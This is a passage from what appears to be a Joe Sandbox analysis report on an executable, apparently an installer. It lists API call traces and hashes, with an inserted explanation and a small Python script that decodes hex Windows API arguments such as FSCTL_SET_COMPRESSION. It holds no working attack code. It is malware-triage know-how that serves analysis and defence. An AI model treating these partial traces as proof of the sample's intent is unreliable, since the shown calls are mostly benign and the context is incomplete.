                                                                              • Opcode ID: 6bd6caa41a15310477e83bc0a49d1206285915d7cd4776c217e2dcd25b97f1c8
                                                                              • Instruction ID: fa7acb0e2d6b8d582b6902519899a90ae2b0afcf3fbb82d78ce799b77582f668
                                                                              • Opcode Fuzzy Hash: 6bd6caa41a15310477e83bc0a49d1206285915d7cd4776c217e2dcd25b97f1c8
                                                                              • Instruction Fuzzy Hash: DF91D134608204EFD715CF69E991F5ABBF9FB49704F2180BAEC0497792D638AE04DB58
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                              • API String ID: 1646373207-3712701948
                                                                              • Opcode ID: 425acd45c57e1a90a14b519a9b70c26380c560e6a4faa307eedde0d31f767984
                                                                              • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                              • Opcode Fuzzy Hash: 425acd45c57e1a90a14b519a9b70c26380c560e6a4faa307eedde0d31f767984
                                                                              • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 00417D0F
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window$Placement$Iconic
                                                                              • String ID: ,
                                                                              • API String ID: 568898626-3772416878
                                                                              • Opcode ID: a0af22d6e47f15c5c805b34526d81a80d06eca119401db975a7b3104afeb2d4e
                                                                              • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                              • Opcode Fuzzy Hash: a0af22d6e47f15c5c805b34526d81a80d06eca119401db975a7b3104afeb2d4e
                                                                              • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001,00000000,00463D0D), ref: 00463B81
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00463CE0,?,00000001,00000000,00463D0D), ref: 00463C10
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00463CC2,?,00000000,?,00000000,00463CE0,?,00000001,00000000,00463D0D), ref: 00463CA2
                                                                              • FindClose.KERNEL32(000000FF,00463CC9,00463CC2,?,00000000,?,00000000,00463CE0,?,00000001,00000000,00463D0D), ref: 00463CBC
                                                                              Similarity
                                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                                              • String ID:
                                                                              • API String ID: 4011626565-0
                                                                              • Opcode ID: ea3eed7d1408edc3882bc6792a8114668d7e879bec7624fad3ea01842ef17e57
                                                                              • Instruction ID: 951735f7a3c6dd48f486321ddf7fb9c00a217b4e97ee71939f184256b73d479b
                                                                              • Opcode Fuzzy Hash: ea3eed7d1408edc3882bc6792a8114668d7e879bec7624fad3ea01842ef17e57
                                                                              • Instruction Fuzzy Hash: 2B41A871A00A58AFCB10EF65DC45ADDB7B8EB88706F4044BAF404B7381E67C9F488E59
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001,00000000,004641B3), ref: 00464041
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,0046417E,?,00000001,00000000,004641B3), ref: 00464087
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00464160,?,00000000,?,00000000,0046417E,?,00000001,00000000,004641B3), ref: 0046413C
                                                                              • FindClose.KERNEL32(000000FF,00464167,00464160,?,00000000,?,00000000,0046417E,?,00000001,00000000,004641B3), ref: 0046415A
                                                                              Similarity
                                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                                              • String ID:
                                                                              • API String ID: 4011626565-0
                                                                              • Opcode ID: 178f21a278dbeca0b5487afb4cc8a3a474e9964bec91cf1fa54baf1df103d301
                                                                              • Instruction ID: 3e1e9a66f2526eb02ce93895e5fa1006c5947d115418489384634c6f5ce8cf05
                                                                              • Opcode Fuzzy Hash: 178f21a278dbeca0b5487afb4cc8a3a474e9964bec91cf1fa54baf1df103d301
                                                                              • Instruction Fuzzy Hash: 7341A434B00A58AFCF11EF65CC859DEB7B9EBC8305F4044AAF804A7341E6389E848E49
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                              • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                              • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                              Similarity
                                                                              • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                              • String ID:
                                                                              • API String ID: 1177325624-0
                                                                              • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                              • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                              • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                              • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
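Joe Sandbox prints API arguments as bare hex, so the intent of CreateFileA(…, C0000000, 00000001, 00000000, 00000003, 02000000, …) followed by DeviceIoControl(…, 0009C040, ?, 00000002, …) above is not obvious at a glance. Decoded, the control code is FSCTL_SET_COMPRESSION (device type FILE_DEVICE_FILE_SYSTEM, function 16, METHOD_BUFFERED, read and write access) with a 2-byte USHORT compression state as the input buffer: the routine toggles NTFS compression on a file or directory it opened GENERIC_READ|GENERIC_WRITE, OPEN_EXISTING, with FILE_FLAG_BACKUP_SEMANTICS so the handle may refer to a directory. That is a request to the volume's file-system driver, not to a custom device driver, which is worth keeping in mind when reading the "communicate with device drivers" signature in the overview. The same decoding applied to the SeShutdownPrivilege routine earlier in this list gives ExitWindowsEx(00000002, 00000000) = EWX_REBOOT, and SetErrorMode(00000001) in the directory-walking routines = SEM_FAILCRITICALERRORS. The decoder below is an added example, not part of the report; its tables are transcribed from the Windows SDK headers and cover only the constants used in these calls plus a few neighbours.

```python
"""Decode the bare hex arguments Joe Sandbox prints in its API summaries into
the Windows SDK names they stand for.  Added example, not part of the report;
tables transcribed from winnt.h, winioctl.h, winuser.h and winbase.h."""

# CTL_CODE(DeviceType, Function, Method, Access) =
#     (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
DEVICE_TYPES = {
    0x07: "FILE_DEVICE_DISK", 0x08: "FILE_DEVICE_DISK_FILE_SYSTEM",
    0x09: "FILE_DEVICE_FILE_SYSTEM", 0x11: "FILE_DEVICE_NAMED_PIPE",
    0x12: "FILE_DEVICE_NETWORK", 0x22: "FILE_DEVICE_UNKNOWN",
    0x2D: "FILE_DEVICE_MASS_STORAGE",
}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]
KNOWN_CODES = {                      # a few complete, well-known codes
    0x0009003C: "FSCTL_GET_COMPRESSION",
    0x0009C040: "FSCTL_SET_COMPRESSION",
    0x000900A4: "FSCTL_SET_REPARSE_POINT",
    0x000900C4: "FSCTL_SET_SPARSE",
    0x00070000: "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    0x002D1400: "IOCTL_STORAGE_QUERY_PROPERTY",
}


def decode_ctl_code(code: int) -> dict:
    """Split a DeviceIoControl control code into its four CTL_CODE fields."""
    return {
        "device_type": DEVICE_TYPES.get(code >> 16, hex(code >> 16)),
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "access": ACCESS[(code >> 14) & 0x3],
        "name": KNOWN_CODES.get(code, "unknown"),
    }


# Bit-flag tables: (mask, name), listed in the order the names should print.
GENERIC_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                  (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE_MODE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = [
    (0x80000000, "FILE_FLAG_WRITE_THROUGH"), (0x40000000, "FILE_FLAG_OVERLAPPED"),
    (0x20000000, "FILE_FLAG_NO_BUFFERING"), (0x10000000, "FILE_FLAG_RANDOM_ACCESS"),
    (0x08000000, "FILE_FLAG_SEQUENTIAL_SCAN"), (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"),
    (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"), (0x01000000, "FILE_FLAG_POSIX_SEMANTICS"),
    (0x00200000, "FILE_FLAG_OPEN_REPARSE_POINT"), (0x00000080, "FILE_ATTRIBUTE_NORMAL"),
    (0x00000020, "FILE_ATTRIBUTE_ARCHIVE"), (0x00000010, "FILE_ATTRIBUTE_DIRECTORY"),
    (0x00000004, "FILE_ATTRIBUTE_SYSTEM"), (0x00000002, "FILE_ATTRIBUTE_HIDDEN"),
    (0x00000001, "FILE_ATTRIBUTE_READONLY"),
]
EWX_FLAGS = [(0x40, "EWX_RESTARTAPPS"), (0x10, "EWX_FORCEIFHUNG"), (0x08, "EWX_POWEROFF"),
             (0x04, "EWX_FORCE"), (0x02, "EWX_REBOOT"), (0x01, "EWX_SHUTDOWN")]
SEM_FLAGS = [(0x8000, "SEM_NOOPENFILEERRORBOX"), (0x4, "SEM_NOALIGNMENTFAULTEXCEPT"),
             (0x2, "SEM_NOGPFAULTERRORBOX"), (0x1, "SEM_FAILCRITICALERRORS")]


def decode_flags(value: int, table, zero: str = "0") -> str:
    """Name every bit group found in table; unknown leftover bits stay as hex."""
    names, rest = [], value
    for mask, name in table:
        if (rest & mask) == mask:
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else zero


def decode_create_file(access: int, share: int, disposition: int, flags: int) -> dict:
    """Name the four numeric CreateFileA arguments that reveal intent."""
    return {
        "access": decode_flags(access, GENERIC_ACCESS),
        "share": decode_flags(share, SHARE_MODE),
        "disposition": CREATION_DISPOSITION.get(disposition, hex(disposition)),
        "flags": decode_flags(flags, FILE_FLAGS),
    }


if __name__ == "__main__":
    # Arguments exactly as printed in the API summaries above (hex, left to right).
    print(decode_create_file(0xC0000000, 0x1, 0x3, 0x02000000))
    print(decode_ctl_code(0x0009C040), "in-buffer size 2 = sizeof(USHORT) compression state")
    print("ExitWindowsEx flags:", decode_flags(0x2, EWX_FLAGS, zero="EWX_LOGOFF"))
    print("SetErrorMode:", decode_flags(0x1, SEM_FLAGS))
```

Decoding the control code rather than matching the whole value is the useful part: an unfamiliar code still yields its device type, function number and transfer method, which is usually enough to tell a file-system request (device type 9) from a call into a third-party driver (device type 0x22, FILE_DEVICE_UNKNOWN, is what most custom drivers use).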
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 0048345E
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0048347C
                                                                              • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,0048293A,0048296E,00000000,0048298E,?,?,?,0049C0A4), ref: 0048349E
                                                                              • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,0048293A,0048296E,00000000,0048298E,?,?,?,0049C0A4), ref: 004834B2
                                                                              Similarity
                                                                              • API ID: Window$Show$IconicLong
                                                                              • String ID:
                                                                              • API String ID: 2754861897-0
                                                                              • Opcode ID: 7adc6d23a2e45bfcb47f86f15328f2256524f13007b9a6bd5233fe1c8f26e82e
                                                                              • Instruction ID: b2d3f2bb309dc3ccac68fe08692f7b65e7038161d92c55b9b58b225abec03440
                                                                              • Opcode Fuzzy Hash: 7adc6d23a2e45bfcb47f86f15328f2256524f13007b9a6bd5233fe1c8f26e82e
                                                                              • Instruction Fuzzy Hash: 750152706012409AE601BFE59D8AB5A26C55F10F49F18087BB9009F2A2DA2DDA858B1C
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00462698), ref: 0046261C
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00462678,?,00000000,?,00000000,00462698), ref: 00462658
                                                                              • FindClose.KERNEL32(000000FF,0046267F,00462678,?,00000000,?,00000000,00462698), ref: 00462672
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: e94515bc2c8b3d54fda8ee7ea50903a5de584af26bf4ddc4af921dcd62f8e3d1
                                                                              • Instruction ID: 64bef34161faf0391a99b618d3e767a3fd2d5c762390acd0a64fbb4d401bfb5a
                                                                              • Opcode Fuzzy Hash: e94515bc2c8b3d54fda8ee7ea50903a5de584af26bf4ddc4af921dcd62f8e3d1
                                                                              • Instruction Fuzzy Hash: E921D831904B147ECB11EB65DC41ADEB7ACDB49304F5084F7F808E22A1E6B89E548F5A
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 004241E4
                                                                              • SetActiveWindow.USER32(?,?,?,0046CBC7), ref: 004241F1
                                                                                • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,023425AC,0042420A,?,?,?,0046CBC7), ref: 00423B4F
                                                                              • SetFocus.USER32(00000000,?,?,?,0046CBC7), ref: 0042421E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveFocusIconicShow
                                                                              • String ID:
                                                                              • API String ID: 649377781-0
                                                                              • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                              • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                              • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                              • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 00417D0F
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Placement$Iconic
                                                                              • String ID:
                                                                              • API String ID: 568898626-0
                                                                              • Opcode ID: 76c66e33316401a89d3facc50d11a2b6f1ba08a7ab00baf439cd89f832e1e53a
                                                                              • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                              • Opcode Fuzzy Hash: 76c66e33316401a89d3facc50d11a2b6f1ba08a7ab00baf439cd89f832e1e53a
                                                                              • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CaptureIconic
                                                                              • String ID:
                                                                              • API String ID: 2277910766-0
                                                                              • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                              • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                              • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                              • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 0042419B
                                                                                • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                              • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                              • String ID:
                                                                              • API String ID: 2671590913-0
                                                                              • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                              • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                              • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                              • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                              • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                              • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                              • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0047872E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 10ca812e3c548e1abffc20113ea3ec26250c704f28d0c7929afa756ed2071b4a
                                                                              • Instruction ID: 93be4e423146f0b72d2fb04b2818289b08cc6f156d75f667f85849a608f59376
                                                                              • Opcode Fuzzy Hash: 10ca812e3c548e1abffc20113ea3ec26250c704f28d0c7929afa756ed2071b4a
                                                                              • Instruction Fuzzy Hash: 81416979604104EFCB10CF99D6889AAB7F5FB48310B74C5AAE809EB701DB38EE41DB55
                                                                              APIs
                                                                              • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D097
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFour
                                                                              • String ID:
                                                                              • API String ID: 2153018856-0
                                                                              • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                              • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                                              • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                              • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                                              APIs
                                                                              • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046D988,?,0046DB69), ref: 0045D0AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFour
                                                                              • String ID:
                                                                              • API String ID: 2153018856-0
                                                                              • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                              • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                                              • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                              • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3875145602.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                               • Associated: 00000001.00000002.3875127821.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000001.00000002.3875164858.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_10000000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                              • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                              • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                              • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3875145602.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
